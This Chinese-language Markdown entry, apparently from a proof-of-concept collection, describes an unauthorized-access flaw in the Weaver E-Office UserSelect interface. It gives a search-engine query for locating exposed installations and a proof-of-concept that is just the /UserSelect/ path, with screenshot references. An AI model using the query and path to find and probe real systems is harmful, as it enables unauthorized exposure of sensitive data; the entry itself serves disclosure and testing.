Awesome-POC/OA产品漏洞/泛微OA E-Office UserSelect 未授权访问漏洞.md

31 lines
447 B
Markdown
Raw Normal View History

2024-11-06 14:10:36 +08:00
# 泛微OA E-Office UserSelect 未授权访问漏洞
## 漏洞描述
泛微OA E-Office UserSelect接口存在未授权访问漏洞通过漏洞攻击者可以获取敏感信息
## 漏洞影响
```
泛微OA E-Office
```
## 网络测绘
```
app="泛微-EOffice"
```
## 漏洞复现
登录页面
![image-20220520134445854](images/202205201344907.png)
验证POC
```
/UserSelect/
```
![image-20220520140409297](images/202205201404369.png)